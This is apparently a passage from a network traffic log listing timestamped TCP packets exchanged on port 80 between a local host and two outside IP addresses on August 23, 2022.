                                                                                                                                                                      Aug 23, 2022 18:26:22.920389891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920408964 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920433044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920437098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920442104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920458078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920481920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920499086 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920521975 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920526981 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920531988 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920546055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920569897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920588017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920613050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920614958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920619011 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920638084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920661926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920669079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920674086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920681000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920705080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920715094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920720100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920728922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920753002 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920773983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920778036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920783043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920798063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920819998 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920821905 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920825005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920847893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920866013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920866966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920870066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920892000 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920911074 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920916080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920917988 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920943975 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920957088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920962095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.920960903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.920986891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921013117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921036005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921039104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921042919 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921053886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921078920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921080112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921104908 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921108007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921130896 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921149015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921168089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921171904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921174049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921197891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921217918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921222925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921224117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921248913 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.921283960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921294928 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.921298027 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:22.922698021 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.966108084 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.966142893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.966166019 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.966237068 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.966276884 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968657017 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968694925 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968723059 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968751907 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968784094 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968796968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968812943 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968823910 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968842030 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968848944 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968873978 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.968885899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968982935 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.968990088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969014883 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969037056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969064951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969067097 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969089031 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969094038 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969110966 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969134092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969136000 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969157934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969160080 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969182968 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969182968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969187975 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969208002 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969212055 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969229937 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969253063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969254017 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969258070 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969278097 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969280958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969301939 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969302893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969325066 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969327927 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969348907 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969350100 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969368935 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969392061 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969392061 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969413996 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969417095 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969435930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969439030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969458103 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969459057 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969463110 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969480991 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969485044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969502926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969508886 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969527960 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969530106 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969548941 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969572067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969573021 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969594002 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969594002 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969607115 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969634056 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969645023 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969672918 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969698906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969702005 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969731092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969738960 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969758987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969772100 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969789028 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969793081 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969815016 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969816923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969837904 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969845057 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969861984 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969871998 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969887972 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969899893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969918013 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969927073 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969938040 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.969957113 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.969985008 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970005989 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970011950 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970041037 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970041037 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970069885 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970072031 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970094919 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970098019 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970113993 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970125914 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970149994 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970154047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970160961 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970184088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970201015 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970213890 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970242023 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970262051 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970268011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970269918 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970288038 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970298052 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970310926 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970325947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970354080 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970354080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970383883 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970383883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970405102 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970412016 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970424891 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970439911 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970455885 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970470905 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970499039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970521927 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970526934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970551014 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970556021 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970581055 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970591068 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970616102 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970642090 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970665932 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970669031 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970689058 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970710993 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970712900 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970736027 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970735073 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970762968 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970762968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970788002 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970788956 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970808983 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970832109 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970834017 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970854998 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970854998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970875978 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970876932 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970899105 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970900059 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970904112 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970921040 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970922947 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970942974 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970946074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970967054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970968962 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.970988989 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.970989943 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971010923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971012115 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971035004 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971038103 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971055984 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971076012 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971080065 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971081972 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971101999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971112967 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971127987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971144915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971165895 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971168995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971189022 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971210003 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971210957 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971215010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971237898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971239090 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971262932 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971266985 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971283913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971287966 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971307039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971307993 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971328974 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971330881 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971353054 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971371889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971388102 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971415997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971440077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971462011 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971486092 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971487045 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971508980 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971513033 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971543074 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971545935 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971564054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971570015 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971587896 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971591949 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971610069 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971632957 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971633911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971654892 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971658945 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971678972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971679926 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971702099 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971723080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971745968 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971728086 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971769094 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971772909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971791983 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971815109 CEST804983377.91.103.222192.168.2.6
